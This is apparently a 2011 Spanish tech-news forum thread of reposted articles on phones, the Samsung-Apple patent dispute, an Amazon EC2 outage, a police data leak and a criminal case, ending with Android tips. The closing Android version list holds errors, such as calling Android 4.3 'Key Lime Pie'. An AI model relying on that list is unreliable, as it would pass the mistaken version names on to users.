
En su interior, un procesador de doble núcleo a 1,2 GHz fabricado por Texas Instruments, 1 GB de RAM y 16 o 32 GB de almacenamiento interno para ficheros, documentos o aplicaciones.

El apartado multimedia queda completado con dos cámaras. Una frontal de 1,3 Megapíxeles para videollamadas, y otra trasera de 5 Megapíxeles con capacidad de grabar vídeo en FullHD.

Obviamente, es compatible con la tecnología NFC, Wi-Fi, Bluetooth y GPS. Como novedad, también soporta redes LTE de cuarta generación.

Por último, nos falta destacar que su batería se queda en los 1.750 mAh, pesa 135 gramos y el grosor es de 8,94 milímetros.

Su lanzamiento se espera para el próximo mes de noviembre, aunque no hay información de qué operadoras llevarán el Galaxy Nexus a cada país ni a qué precios.

Fuente:
http://bandaancha.eu/articulo/8112/google-presenta-galaxy-nexus-android-4-0
#193
Una mujer de 49 años ha sido detenida junto con su hija de 16 años, su hijo de 19, y la novia de éste, de 17 años, tras buscar en Google formas de acabar con la vida del abuelo de 89 años y así repartirse la millonaria herencia, según publica el diario británico 'The Guardian'.

Esta macabra familia de Winchester, Inglaterra, realizó en Internet búsquedas como: "10 maneras fáciles de matar a alguien sin dejar rastro", "¿Puedo matar a alguien de un puñetazo?", "posibilidades de envenenar a una persona de 89 años" o "¿si golpeas a alguien en la parte posterior de la cabeza con un ladrillo se muere o simplemente le sale un moratón?".


Al principio, la hija adoptiva del anciano y sus hijos intentaron recursos como lanzar ladrillos a través de la ventana de la habitación de la víctima mientras dormía o cortar el manguito del combustible de su coche para hacerlo explotar, pero no consiguieron su objetivo.

Finalmente, decidieron atacar a su abuelo, golpeándole con una bolsa llena de ladrillos en la vivienda familiar. El hombre salió al jardín creyendo que su hija se había desmayado en la parte trasera de la casa. Una vez fuera, fue atacado por sus nietos y la novia de uno de ellos que empezaron a golpearle con las bolsas.

Después del ataque, la nieta llamó al teléfono de emergencias asegurando que su abuelo había sufrido una caída. El hombre sobrevivió a la paliza, con cortes y fuertes golpes en la cabeza. Durante la investigación, la Policía registró los ordenadores de la familia y al examinar los historiales de Google encontraron las búsquedas realizadas. La intención de los acusados era matarle por la herencia a pesar de que el anciano les había dado dinero en varias ocasiones para comprar coches y caballos.

La hija de la víctima ha sido condenada a 17 años de cárcel. Sus hijos y la novia de uno de ellos han sido condenados a una pena indeterminada en una institución para jóvenes delincuentes por conspiración. El hombre de encuentra actualmente en una residencia con su mujer.


Fuente:
http://www.que.es/ultimas-noticias/internacionales/201110182006-buscaron-google-como-matar-abuelo-cont.html

http://blogs.lainformacion.com/futuretech/2011/10/17/el-historico-de-busquedas-en-google-sirve-para-condenar-a-una-familia-por-intentar-asesinar-al-abuelo-millonario/
#194
Noticias / HTC Rhyme, teléfono pensado para mujeres
21 Septiembre 2011, 12:01 PM
HTC ha confirmado el smartphone Rhyme, un terminal orientado al mercado femenino (por el color) que de momento se lanzará en Estados Unidos, pero que no sería de extrañar verlo por Europa en las próximas semanas.

Con Android Gingerbread y su correspondiente capa HTC Sense 3.5, dispone de una pantalla de 3,7 pulgadas WVGA que combina con un procesador a 1 GHz y compatibilidad para redes HSPA, Wi-Fi y GPS.

Por otra parte, el apartado fotográfico queda resuelto con una cámara de 5 Megapíxeles trasera.

Todavía no se conoce su precio.



Fuente:
http://www.noticias3d.com/noticia.asp?idnoticia=47787
#195
    El archivo incluye 33 nombres con apellidos, DNI y categoría en el cuerpo
   La página web de la Policía permanece caída en estos momentos
   Aparecen alusiones a las elecciones del 20-N y críticas a Rubalcaba


Más de 30 policías, todos ellos parte de la escolta personal de la Presidencia del Gobierno, han quedado al descubierto en Internet después de que un presunto miembro de Anonymous haya publicado en la Red un archivo en el que se incluye la relación de nombres, apellidos, DNI y categoría de todos ellos.

Además, en el documento también se anuncia 'en breve' la publicación de los mismos datos del Grupo Especial de Operaciones (G.E.O.).

El ataque ha provocado la caída de la página web de la Policía Nacional, que a media tarde permanecía inaccesible. Fuentes de la Dirección General de la Policía han confirmado a EFE que la Brigada de Investigación Tecnológica (BIT) está investigando el caso para confirmar si los 'hackers' han conseguido burlar las medidas de seguridad de la red corporativa de la Policía Nacional.
Ataques a Rubalcaba

Tras la relación de nombres se incluyen varias consignas en relación con la próxima cita electoral del 20-N en la que critican al candidato socialista a la Presidencia, Alfredo Pérez Rubalcaba, y le solicitan, parafraseando sus consignas electorales, que "escuche al pueblo", que "dimita o se jubile" y que "explique "la violencia policial, la manipulación de informes y pruebas y el expediente al policía que apoyó el 15-M".

Pese a la gravedad de la publicación de los datos privados de los agentes, en la Red se debate sobre la verdadera autoría de la acción. Y es que ni el canal utilizado -un servidor para subir archivos en el que ya se ha descolgado el documento- ni la forma, que dan en calificar como poco clara, responden a lo visto anteriormente por el colectivo.

En todo caso, la publicación de datos policiales por parte de Anonymous no es algo excepcional. El pasado mes de agosto, el grupo sacó a la luz los nombres de más de 100 policías de la red de transporte público de San Francisco.

Fuente:
http://www.elmundo.es/elmundo/2011/09/15/espana/1316102511.html
#196
Foro Libre / Últimas entradas NoConName a 30€
15 Septiembre 2011, 16:13 PM
EVENTOS:
*- NoConName 2011 - Congreso de seguridad en Barcelona 16 y 17 de Septiembre 2011
http://www.noconname.org/congreso.html#timetable

Entradas por tan solo 30 EUROS indicando el código de descuento NCN2011EH.NET en el campo Comentarios. El precio real de la entrada es de 120 EUROS, pero con el código de descuento del foro tan solo 30 EUROS hasta agotar plazas.

Recordad que aunque se marque "Acceso al Evento - 120 € " con el código solo se os cargarán 30€.
#197
Los rumores sobre el lanzamiento del iPhone 5 podrían llegar a su fin según las últimas informaciones conocidas de fuentes cercanas a Apple. El 7 de octubre parece la fecha señalada para la llegada a las tiendas del próximo smartphone de la compañía estadounidense.

Nuevas filtraciones en medio del secretismo de Apple. Aunque la compañía mantiene su mutismo absoluto sobre el lanzamiento de su terminal de quinta generación, según medios especializados en los dispositivos de Apple, fuentes de la compañía habrían confirmado que en septiembre se llevará a cabo un evento especial en el que se presentará el esperado móvil. A partir de este evento comenzará la cuenta atrás para poner a la venta un terminal que se estaría fabricando desde este mismo mes de agosto.

El viernes 7 de octubre sería el día elegido para la puesta a la venta del dispositivo, aunque podría reservarse desde el 30 de septiembre. Tal y como ha sucedido con otros dispositivos de la compañía como el iPhone 4 o las tabletas iPad, el móvil llegaría en primer lugar a las tiendas de Estados Unidos y de ahí daría el salto a territorio europeo semanas más tarde, aunque también cabría la posibilidad de un estreno mundial para la citada fecha.

Duros rivales para el nuevo móvil de Apple

Lo cierto es que el iPhone 5 está generando una gran expectación también en parte gracias a los últimos movimientos en el mercado por parte de los más directos rivales de Apple. Los terminales de última generación con procesador dual core como el Samsung Galaxy S II, LG Optimus 2X o el HTC Sensation han visto la luz con meses de antelación al próximo terminal del gigante de Cupertino y le han ganado cierto terreno, pero hay que tener en cuenta la gran respuesta entre el público que tienen los productos de Apple.

Aunque se espera un terminal de lo más potente, poco se sabe del nuevo iPhone 5. Sólo a través de rumores conocemos algún detalle que potencialmente tendría el próximo smartphone de Apple. Igualmente, el falso iPhone 5 que llegó ya al mercado chino y que, teóricamente, está basado en lo que ofrecerá el terminal oficial, ha mostrado varias características que se esperan del nuevo móvil como la amplitud de su pantalla hasta las 4,2 pulgadas o la incorporación de una cámara de 8 megapíxeles capaz de grabar vídeo en calidad Full HD (1080p).


Fuente:
http://www.adslzone.net/article6651-el-iphone-5-se-lanzara-el-7-de-octubre.html
#198
Victoria de la compañía en el conflicto contra Apple
Samsung ya puede vender su Galaxy Tab 10.1 en Europa
J. Gómez | 17 de Agosto 2011 | 17:00 16 comentarios
Hace sólo una semana conocíamos una preocupante noticia para Samsung. El fabricante coreano, inmerso en una batalla por culpa de patentes con Apple veía cómo un tribunal alemán bloqueaba la venta de la Samsung Galaxy Tab 10.1 en territorio europeo, pero por ahora el bloqueo ha sido levantado salvo en el país centroeuropeo.

Nuevo capítulo en la ajetreada guerra de patentes que existe entre Samsung y Apple. Acusada la firma asiática por parte de la compañía de Cupertino de copiar su productos, la batalla ha vivido un nuevo episodio tras la polémica decisión del tribunal de la ciudad alemana de Düsseldorf que suponía la prohibición de venta de la tableta Samsung Galaxy Tab 10.1 en nuestro continente.

Movilzona.es recoge las novedades en este caso, que en esta ocasión sonríen a Samsung. Tras presentar las pruebas en las que alegaba que su tablet no es una copia del iPad y que no infringe ninguna de las patentes, el fabricante asiático ha conseguido que el juez dé marcha atrás en su sentencia y pueda seguir distribuyendo la tableta Android por todo el territorio europeo para su inminente comercialización. No obstante, el triunfo no ha sido total para los coreanos, ya que de momento el bloqueo continuará en Alemania.

Las pruebas aportadas por Apple, que podrían haber sido modificadas, también habrían colaborado a la hora de impulsar al tribunal alemán a revocar su decisión. La compañía estadounidense habría mostrado fotografías retocadas para acusar a Samsung de haber imitado el iPad 2 tanto en el hardware y embalaje de la Galaxy Tab 10.1. Según las previsiones, estas pruebas falsificadas también podrían ser fundamentales para que el juez levantase el bloqueo en Alemania, decisión que se prevé sea tomada el 25 de agosto.



"Apple ha sido imprudente desde el principio. Ahora la situación se está inclinando a nuestro favor", aseguraron con confianza fuentes de Samsung en Corea. Y es que estamos ante un serio rival del iPad 2 a nivel de prestaciones y calidad. Reducida en su grosor y peso, destaca por su amplia pantalla de 10,1 pulgadas, capaz de mostrar vídeo en Full HD (1080p), así como por su potente cámara trasera capaz de grabar vídeo también en dicha calidad.

fuente:
http://www.adslzone.net/article6653-samsung-ya-puede-vender-su-galaxy-tab-101-en-europa.html
#199


Los mecanismos de ahorro energético de los smartphones hacen que cada poco tiempo tengan que reconectarse a la red de datos 3G. Esto genera mucho tráfico de control, que puede llegar a saturar la red en zonas con mucha densidad de usuarios, imposibilitando que otros clientes tengan acceso a Internet a pesar de que aparentemente se tiene un buen nivel de cobertura. A este fenómeno se le conoce como "signaling noise", o ruido por señalización.

La popularización de teléfonos inteligentes que están orientados a utilizar con frecuencia la red de datos móviles, como los iPhone, Android o BlackBerry, ha generado un nuevo problema en la red que hasta hace apenas un año no aparecía, la saturación de los canales de control que la red móvil reserva para establecimiento de conexiones. El cuello de botella no está, por tanto, en la capacidad de transmisión de datos puros y duros.
El ahorro de batería de los smartphones sobrecarga las redes

La mayoría de las comunicaciones de datos tienen un perfil de ráfaga, es decir, el tráfico se envía mayormente en cortos espacios de tiempo, para luego mantenerse a la espera.

Esto hace energéticamente ineficiente tener constantemente la conexión de datos activa y, siendo la autonomía de la batería un aspecto clave en este tipo de dispositivos móviles, se incorporan protocolos de desconexión restaurando el enlace cada vez que, por ejemplo, se comprueba si hay correo electrónico nuevo.

Con cada establecimiento y cierre de la conexión, que puede haber cada día centenares por cada terminal de este tipo, se genera tráfico de señalización en la red.
Además, cada fabricante de móviles tiene su propio protocolo "Fast Dormancy" para este propósito, buscando una desconexión total.

Ante tal variedad, la norma 3GPP Release 8, una de las que rigen el funcionamiento de las tecnologías móviles, viene a poner cierto control con una función llamada Network Controlled Fast Dormancy que añade estados intermedios como de "letargo". Es decir, los móviles pasan a un estado de ahorro energético, pero sin desconectarse completamente de la red.

Sin embargo, esto sólo lo pueden hacer en las zonas donde la red sea compatible con este estándar, y se mantienen utilizando su protocolo propio en las demás áreas.

Apple fue la primera empresa en adoptar el estándar de la 3GPP con el lanzamiento de iOS 4.2, reduciendo el tráfico de control que sus iPhone 4 generaban en un 55% donde la red lo permite. Los Nokia con Symbian también siguen los mandados del estándar, pero Android parece no ser todavía compatible.

La diferencia entre ambas técnicas es muy clara: pasar de estado desconectado (idle) a activo requiere 30 mensajes de control, mientras que pasar de un estado intermedio (Cell_PCH) a activo, sólo 12, con el consiguiente ahorro en tiempo de establecimiento (2 segundos por 0,5 segundos).

Estas técnicas propias, por tanto, generan más tráfico de señalización en la red, que puede llegar a saturarla más fácilmente y dejarla inoperativa para cursar llamadas o conexiones de datos, aunque el usuario vea en su terminal que hay cobertura.
Además, el problema se agrava cuando, si un móvil no consigue abrir una conexión, vuelve a lanzar la petición a la red cargando más tráfico en los canales de señalización.

Como se puede ver en estos gráficos extraídos de un informe de Nokia Siemens Networks, aunque los smartphones generan sólo un 40% del tráfico de datos en las redes móviles, se llevan el 99% en los canales de control. Es bastante impactante ver cómo las BlackBerry apenas suponen el 2% de los datos, pero acaparan el 26% del tráfico de control (ver imagen que abre el artículo).

También se observa el comportamiento tan distinto del un smartphone y un portátil jugando on-line media hora:



Las operadoras han ido incrementando su preocupación al respecto, y tiene pinta de que puede llegar a ser peor, ya que cada vez hay más dispositivos orientados a estar constantemente conectándose a las redes 3G: más teléfonos, tablets, portátiles...
Problemas en grandes ciudades o zonas turísticas

Fue en las grandes ciudades de Estados Unidos donde se vivió primero el fenómeno. También O2, filial de Telefónica en Reino Unido, ha lidiado con este problema, y ni siquiera asignar más espectro para estos canales de señalización lo solventaba completamente.

Aunque en España no ha habido revuelo, es algo que podría estar sucediendo en zonas turísticas actualmente pues no son pocos los que dependen de la conexión 3G para conectarse en segundas residencias u hoteles, y puede que sea la razón por la cuál en algunos puntos la telefonía móvil se comporta de modo errático.

Si bien es un problema que no tiene una solución inmediata, sí se insta a los fabricantes de equipamiento de red y terminales a que implementen el estándar de la 3GPP, ya que está pensado para que tanto el consumo de energía como el tráfico que soportan las redes encuentren el punto óptimo simultáneo.

Fuente:
http://bandaancha.eu/articulo/8010/cobertura-maximo-pero-no-consigues-establecer-conexion-datos-saturacion-signaling-noise
#200
Parece que, después de una primera generación bastante decepcionante, los tablet con sistema operativo Android por fin están cuajando. Desde Xataka Android se hacen eco de un estudio de la consultora ABI Sesearch que asegura que los tablet Android le han quitado un 20% de cuota de mercado al iPad.

El porcentaje aún está muy lejos de suponer un peligro serio para la hegemonía del tablet de Apple, pero parece que los dispositivos que compiten con él poco a poco van cogiendo carrerilla. ABI Research calcula que, de aquí a 2015, se venderán 120 millones de tablets Android.

http://www.xatakandroid.com/tablets-android/los-tablet-android-le-quitan-un-20-de-cuota-de-mercado-al-ipad
#201


Mozilla sigue adelante con su estrategia para hacer que Firefox sea un navegador muchísimo más rápido que antes. Además de las mejoras en rendimiento de cada versión, Mozilla anunció que reduciría significativamente el consumo de memoria RAM de Firefox, y ahora atacan a los complementos no deseados por el usuario.

No, no me refiero a complementos maliciosos. Me refiero a esos complementos que vienen de regalo con ciertos programas gratuitos, que no hacen más que añadir barritas saturadas de cosas o botones que no sirven para nada. Normalmente no los queremos instalar, pero ya sea por que el instalador no avisa o porque el avezado usuario sólo da al botón Siguiente sin leer las opciones del instalador estos complementos acaban en nuestro Firefox.

¿Cómo atajar esto? Dando al usuario la posibilidad de controlar si de verdad quiere esos complementos instalados por programas externos a través de dos opciones que Mozilla incluirá en Firefox 7, y que aparecerán en la versión de desarrollo Aurora a partir de la semana que viene.



La primera es bastante obvia: si Firefox detecta que se ha instalado un complemento sin el permiso del usuario (que viene a ser tan sencillo como descomprimir la extensión en el directorio de extensiones del perfil de Firefox), preguntará al usuario si de verdad quiere instalar esa extensión con el diálogo que aparece en la imagen de encima.

¿Que es un diálogo intrusivo? Pues sí. Pero es necesario: una gran parte de los usuarios que instalan estos complementos lo hacen porque no se fijan en lo que dice el instalador, así que tampoco se fijarían en un aviso menos intrusivo. Si Mozilla quiere que todos los usuarios tengan un navegador sin complementos basura, este es el camino a seguir.



La segunda opción, que es la que veis en la imagen, aparecerá sólo una vez, al actualizar. Es una ventana que mostrará todos los complementos instalados por el usuario, y que desinstalará todos los que hayan sido instalados por terceras partes (claro está, salvo los que el usuario quiera conservar).

La verdad es que me parece una idea muy buena por parte de Mozilla. La sobrecarga de complementos es uno de los problemas más comunes en Firefox, y dar más control al usuario para evitar la instalación de complementos de terceros es una forma genial de atajar (en parte) ese problema.

Fuente:
http://www.genbeta.com/navegadores/mozilla-quiere-evitar-que-firefox-se-llene-de-complementos-no-deseados
#202
Noticias / Google Plus ya tiene juegos
12 Agosto 2011, 17:33 PM
Vic Gundotra, vicepresidente Senior de Google, ha anunciado el debut de una pestaña en su red social que permitirá el acceso a un nuevo servicio de juegos.

En el nuevo apartado los usuarios podrán ver una lista de juegos, aquellos que han considerado como favoritos, e información sobre los juegos que han utilizado sus amigos recientemente.

Otras funciones que ofrece el servicio se refieren a la posibilidad de encontrar invitaciones a juegos, así como variadas interacciones.

Desde Google+ han optado por diferenciar este servicio del de Facebook en el hecho de que las actividades que realiza un usuario en el apartado de juegos no aparecen en su timeline general.

Los planes de Google con los juegos pasan por ir progresivamente introduciendo el apartado de juegos en los perfiles de los usuarios y dar a estos la posibilidad de enviar sus opiniones y sugerencias sobre su experiencia.

Además, la empresa de Mountain View  ha estrenado el blog googleplusplatform.blogspot.com, a través del cuál se pueden ver las últimas noticias de la plataforma.

http://googleblog.blogspot.com/2011/08/games-in-google-fun-that-fits-your.html

Fuente:
http://www.theinquirer.es/2011/08/12/google-plus-ya-tiene-juegos.html
#203
Más problemas para Adobe, pero esta vez no vienen de Cupertino. Un ingeniero de Google ha enviado reclamaciones tras descubrir un número de errores "vergonzosamente grave" en Flash Player. Al parecer, oficialmente habían 13 errores listados pero desde Google detectaron más de 400 fallos distinguibles.

El ingeniero, Travis Ormandy, se especializa en seguridad y también se queja de que no ha recibido crédito alguno por descubrir esos errores, algo común en este tipo de casos. El asunto llegó al gerente de comunicaciones de Adobe, quien a su vez se quejó de que Travis confundía errores con ficheros de ejemplo. Finalmente los errores se han corregido con un parche en las últimas versiones de Chrome donde se destaca el trabajo de Travis:

   El equipo de Chrome quiere agradecer especialmente a Travis Ormandy, del equipo de seguridad de Google, por invertir una gran cantidad de tiempo y trabajo de los ordenadores para identificar un número significativo de vulnerabilidades resueltas en esta versión de Flash Player.


En cuanto a Adobe, ha declarado también finalmente que Travis y el equipo de Chrome han hecho un gran trabajo con sus mejoras aplicadas al reproductor de Flash. Discusiones entre compañías aparte, es esencial que este tipo de errores se corrijan lo antes posible para la seguridad del usuario.


Fuente:
http://www.genbeta.com/seguridad/un-ingeniero-de-google-denuncia-una-cantidad-vergonzosamente-grave-de-errores-en-flash-player
#204
El conocido servicio de distribución digital de juegos ha iniciado la versión beta de sus sistema "Steam Trading". Dicho sistema permite, de momento, intercambiar objetos de "Team Fortress 2" y los juegos que nos hayan regalado, aunque el sistema se irá extendiendo progresivamente a otros títulos (según Valve, Portal 2 será el próximo).

Como todo no es perfecto, y es que para que podamos beneficiarnos de este sistema no tendremos que haber jugado al juego que queramos cambiar, lo que hace que, de momento, resulte un tanto limitado, pero no por ello deja de ser un primer paso interesante. Para utilizar el servicio, sólo tenéis que seguir estos pasos:


  •     Iniciamos sesión en nuestra cuenta de Steam
        Pulsamos en la pestaña superior izquierda de homónimo nombre
        Accedemos a los Parámetros
        Desde ahí vamos a donde pone "Cambiar" en "Participación en la beta"
        Seleccionamos "Steam Trade Update" y aceptamos
        Reiniciamos el servicio y listo

Fuente:
http://www.noticias3d.com/noticia.asp?idnoticia=47139
#205
Noticias / Twitter permite compartir imágenes
12 Agosto 2011, 17:28 PM
Twitter anunció el pasado mes de junio que sus usuarios podrían compartir imágenes en breve.



La gran noticia ya es posible y, de este modo, cuando los usuarios inicien sesión en la versión web de Twitter, serán recibidos con un mensaje que les dirigirá hacia un nuevo icono de una cámara debajo del cuadro de mensajes para elegir la foto que quieran subir.

Habrá un límite de 3 megas para el tamaño de las fotos, que inmediatamente aparecerán como miniaturas antes de que un usuario complete el mensaje.

Los usuarios también tienen la posibilidad de incluir una función de búsqueda a las fotos, añadiendo hashtags para el tweet. Además, los usuarios también pueden comentar las fotografías simplemente respondiendo al tweet con el enlace de la fotos.

Fuente:
http://www.noticias3d.com/noticia.asp?idnoticia=47129
#206


El segmento de los móviles acorazados entra de lleno por fin en los equipos corriendo Android. El fabricante Elektrobit Corporation acaba de anunciar la Specialized Device Platform, una unidad de negocio que confecciona móviles acorazados a medida orientados a usos militares y de defensa. Esta gama de móviles Android se centra en los bajos costes de producción y rápidos procesos de fabricación como principales objetivos.

En lo tocante al aspecto técnico de los equipos, estaremos ante unos Froyo con procesador OMAP3 de un solo núcleo a 1GHz, con pantalla capacitiva (a escoger entre 4 ó 4,3 pulgadas), cámara de 5 megapíxeles, cámara frontal VGA, WiFi, Bluetooth, GPS y cuatribanda GSM, tribanda UMTS/HSDPA y CDMA2K/EVDO.

Habrá también una versión con LTE a 700 MHz, pero los interesados en hacerse con ella deberán esperar a la primera mitad de 2012, cuando estos modelos con procesador OMAP4 de doble núcleo a 1,5 GHz estén disponibles.

Fuente:
http://es.engadget.com/2011/08/09/elektrobit-corporation-comercializara-moviles-android-acorazados/
#207
Google+ quiere expandirse. Desde ahora, disponemos de 150 invitaciones por cada cuenta de usuario. Así lo ha anunciado la compañía de Mountain View a través de Balaji Srinivasan, ingeniero de software de Google.

El anuncio no es de hoy, pero no he querido comentar la noticia hasta ver en mi cuenta que dicha posibilidad está activada. Y ya lo está, como puede verse en la captura de pantalla que acompaña esta entrada.

    Hemos oído que quieres invitar a tus amigos, pero a veces no conoces sus direcciones de correo electrónico... o, a veces no es fácil encontrarlas.

    Para solucionar esto, vamos a desplegar una nueva característica en los próximos días, que te permite invitar a otros, simplemente mediante el uso de un enlace.

    Cuando hagas clic en el botón para invitar amigos de la parte derecha de la página, encontrarás un nuevo enlace que puedes enviar por correo a tus amigos o publicarlo en la Web

Los usuarios presionan para poder invitar a sus amigos. Google+ aún está en periodo de pruebas, y como comenta Balaji Srinivasan, esta es la razón de limitar a 150 el número de invitaciones disponibles por cuenta de usuario, de momento.

Fuente:
http://www.genbeta.com/redes-sociales/google-permite-hasta-150-invitaciones-por-cuenta
#208
Noticias / La nube de Amazon se cae en Europa
8 Agosto 2011, 21:08 PM
Debido a algún problema relacionado con el suministro eléctrico, el servicio «en nube» EC2 de Amazon (Amazon Elastic Compute Cloud) ha mordido el polvo hacia las 20.00 hora española, provocando una caída total de los sistemas y arrastrando con ello a miles de servicios y páginas web allí alojadas. También han quedado afectadas las tiendas de Amazon en Reino Unido y Alemania, a las que sencillamente no se podía acceder, además de algunos servicios relacionados de la compañía, como CloudWatch y el servicio de bases de datos.

La última información es que se está recuperando el suministro eléctrico y se restaurará el servicio en 30-60 minutos, es decir hacia las 22.00-22.30 hora española. Se puede seguir la información sobre el status de Amazon EC2 en status.aws.amazon.com.

Como vuelven a demostrar los hechos, los «servicios en nube» no están exentos de problemas temas de seguridad aparte, por muy grande que sea el gigante que los gestione.

Actualización: El servicio BPOS de Microsoft (Business Productivity Online Services) incluyendo Exchange Online, SharePoint, Office Communications Online, etcétera también está alojando en la zona de Dublín (Irlanda) y también ha sufrido el mismo problema: está caído hace unas dos horas.

Actualización (22.30 GMT+2): La conectividad vuelve y Amazon.co.uk y Amazon.de funcionan de nuevo, otros de los servicios allí alojados en cambio no. Al parecer el fallo general de suministro en Dublín se ha debido a una explosión en una subestación eléctrica, según fuentes que están trabajando en el seguimiento y resolución técnica del problema.

Actualización (22.35 GMT+2): Según publica Amazon en su página de alertas de servicio, aunque parte de los sistemas se han recuperado están teniendo problemas con un generador, lo que impide que toda la zona afectada (EC2 EU-West) pueda volver a estar en línea. Las malas noticias: No hay una estimación sobre cuándo puede resolverse el problema. Esto supone que alrededor de mil sitios web europeos, que es la cifra que se calcula de forma aproximada están allí alojados, van a seguir caídos y completamente desconectados hasta que se resuelva el problema.

Actualización (22.50 GMT+2): Aunque los generadores de emergencia de Amazon Ec2 han entrado en funcionamiento ha sucedido como en otros casos similares: no han podido mantener la refrigeración en los servidores, lo que ha provocado la caída general. (Salvando las distancias, el problema es bastante similar al ocurrido con los generadores y sistemas de emergencia de la central nuclear de Fukushima.)

Actualización (23.10 GMT+2): Amazon ha anunciado que ha reinciado EC2 y que algunas de las instancias ya funcionan y están accesibles, mientras trabajan en el resto.

Actualización (8 de agosto de 2011, 00.50 GMT +2): Amazon confirma que la explosión (y posterior incendio) en la subestación eléctrica fue causada por el impacto de un rayo; normalmente eso no sería problema porque los generadores de emergencia habrían actuado, pero el impacto fue tan fuerte que se propagó hasta la zona de control «que sincroniza la planta generadora», inutilizándola. La caída total duró unas tres horas, mientras se sincronizaban los generadores manualmente. Desde las 22.47 GMT+2 se están recuperando las diversas instancias que dependen del servicio EC2, pero todavía hay problemas sin resolver con la alimentación eléctrica, de modo que puede que se necesite más tiempo de lo habitual en recuperarlo todo al completo.

Actualización (09.30 GMT +2): Amazon ha confirmado que gran parte de los servicios e instancias ya están funcionando, pero que debido a complejos problemas técnicos algunos otros podrían requerir entre 24 y 48 horas para estar funcionando como anteriormente. Microsoft por su parte ha recuperado todos sus servicios BPOS tras las primeras dos o tres horas del incidente.

Fuente:
http://www.microsiervos.com/archivo/noticias/nube-amazon-europa-caida.html
#209
Noticias / Vista previa en Gmail
8 Agosto 2011, 21:05 PM
Gmail ya dispone de una nueva herramienta mediante la cual podremos ver el contenido de un correo electrónico sin tener que abrirlo. Bautizada como Preview Pane, esta nueva función está especialmente optimizada para las pantallas de mayor resolución, aunque todas ofrecerán vista previa horizontal o vertical.

También tendremos la opción de poder desactivarla mediante la opción Not Split. Según informa la compañía a través de su blog oficial, si tardamos más de tres segundos en previsualizarlo se marcará como leído automáticamente.



Fuente:
http://www.noticias3d.com/noticia.asp?idnoticia=47062
#211


Y una nueva aplicación que 'salta' de iOS a Android, aunque en esta ocasión, seguro que interesa a un elevadísimo número de usuarios: ¿recuerdas Viber? esta app permite realizar llamadas VoIP (y totalmente gratuitas) mediante 3G o WiFi y sin necesidad de realizar ningún tipo de registro. Pues bien, ahora está ya a tiro de los androides, contando con todas las prestaciones ya ofrecidas en su semejante en iOS, así como algunas lindezas que hemos podido ver en la beta, como hacer de Viber la aplicación de llamadas por defecto o las notificaciones. La compañía asegura que cuenta ya con más de doce millones de usuarios tras apenas 9 meses de vida. Impresionante. Te dejamos con un vídeo tras el salto.

[youtube=425,350]http://www.youtube.com/watch?v=0nQN5w5ct_E[/youtube]

Fuente:
http://es.engadget.com/2011/07/20/viber-la-app-para-llamadas-voip-llega-a-android/
#212
Atajos de teclado

Para terminales Android con teclado QWERTY, existen algunos atajos de teclado que bien pueden agilizar el uso del terminal. Aquí recogemos algunos de los más prácticos:

1. Atajos para la introducción de texto:

•Copiar: Menú + C
•Pegar: Menú + V
•Deshacer: Menú + Z
•Borrar carácter a la derecha: Shift + Delete
•Borrar una línea entera: Alt + Delete
•Mover cursor al principio de línea: Alt + ratón izquierda
•Mover cursor al final de la línea: Alt + ratón derecha
•Marcar texto para copiar o pegar: Shift + ratón derecha, izquierda, arriba o abajo
•Seleccionar todo el texto: Menú + A

2. Atajos del navegador:

•Ampliación: Menú + I
•Reducción: Menú + O
•Buscar en una página: Menú + F
•Atrás una página: Menú + J
•Avanzar una página: Menú + K
•Recargar: Menú + R


>GESTOS/ATAJOS

- Subir (deslizar de izquierda a derecha) o bajar (de izquierda a derecha) el brillo de la pantalla deslizando el dedo en la barra superior (la que indica batería, cobertura...). Para que funcione hay que desactivar el brillo automático.

- En los contactos, si desplazamos el dedo sobre un nombre hacia la izquierda enviaremos un sms a ese contacto y si lo desplazamos hacia la derecha le llamaremos.

- En los contactos, en las letras de la derecha para buscar un contacto mantened pulsado en una letra y arrastrad hacia la izquierda y se os desplegará otra lista de letras para buscar el segundo caracter de la persona que estáis buscando.

- En el reproductor de música, la radio y los sms si mantenéis pulsada la tecla de subir volumen os dirá lo que estáis escuchando.

- Si mantenéis pulsado el botón táctil de abajo a la izquierda se os abre un buscador para encontrar canciones, contactos, fotos, apps... del teléfono.

- Para cambiar los 4 iconos principales de abajo, entráis a aplicaciones y le dais a menú > editar y luego mantenéis pulsado sobre una aplicación y la arrastráis a la barra inferior.

- Si MANTENÉIS pulsado el botón táctil VOLVER y pulsáis el botón físico central se os hará una captura de pantalla.




Versiones de Android



   Versiones previas de Android (milestones) en las que aparecen Astroboy o Bender.

•     Android 1.0 (sin nombre en código) o Apple Pie (Tarta de manzana)
•     Android 1.1 – Petit Four - Banana Bread (Pan de plátano)
•     Android 1.5 – Cupcake (Magdalena glaseada)
•     Android 1.6 – Donut (Rosquilla)
•     Android 2.0 – Éclair (Pepito, petisú, suso o canuto)
•     Android 2.2 – Froyo (Yogur helado)
•     Android 2.3 – Gingerbread (Pan de jengibre)
•     Android 3.0 – Honeycomb  (Panal de miel)
•     Android 4.0 – Ice Cream Sandwich (Sándwich de helado)
•     Android 4.1.2 – Jelly Bean (Judía de gominola)
•     Android 4.3 – Key Lime Pie (Tarta de lima).






Android 1.5 - Cupcake (abril de 2009). Basada en el kernel 2.6.27 de Linux, con mejoras en el ámbito multimedia (grabación de vídeo o subir vídeos a YouTube o fotos a Picasa) y de conectividad (como la conexión con auriculares mediante Bluetooth).

•Rediseño completo de todos los elementos de la interfaz.
•Interfaz de Android 1.1 (izquierda) y Android 1.5 (derecha), vía Android Developers.
•Transiciones animadas entre ventanas.
•Mejoras en la velocidad de la cámara.
•Menor tiempo de búsqueda de los satélites GPS, gracias a la posibilidad de utilizar A-GPS.
•Mejoras en la velocidad del navegador web gracias a la inclusión de la última versión de Webkit, el engine de renderizado, y SquirelFish.
•Intérprete javascript.
•Añadida la posibilidad de copiar y pegar texto y buscar texto dentro de una página web.
•Posibilidad de personalizar los widgets mostrados en la pantalla de inicio.
•Inclusión de teclado en pantalla, con soporte para orientación vertical y apaisada, funcionalidades de autocorrección y soporte de diccionarios del usuario.
•Añadida la posibilidad de grabar y reproducir vídeos.
•Soporte de Bluetooth Stereo.
Una de las caracteristicas mas importante es que esta version incluye un kernel de Linux 2.6.27
Esta fue lanzada en abril 2009

Android 1.6 - Donut (septiembre de 2009). Basada en el kernel 2.6.29 de Linux, incluía mejoras en Market, búsqueda mediante voz, compatibilidad con pantallas WVGA y aumento en la velocidad.

